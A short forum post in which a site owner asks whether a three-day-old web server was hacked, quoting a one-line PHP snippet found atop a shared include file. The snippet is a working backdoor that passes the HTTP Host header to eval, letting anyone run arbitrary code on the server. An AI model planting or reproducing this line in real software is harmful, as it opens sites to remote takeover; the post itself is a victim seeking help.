    PHP/Server experts, did my server get hacked? (info inside)

    I found this in the top of an include file which all my pages includes this morning :

    $s=@$_SERVER['HTTP_HOST'];if($s){@eval($s);exit;}

          This happened on a 3 day old webair server.. the site isn't even public yet...

          Should I claim a full refund? .. this server can't be secure?
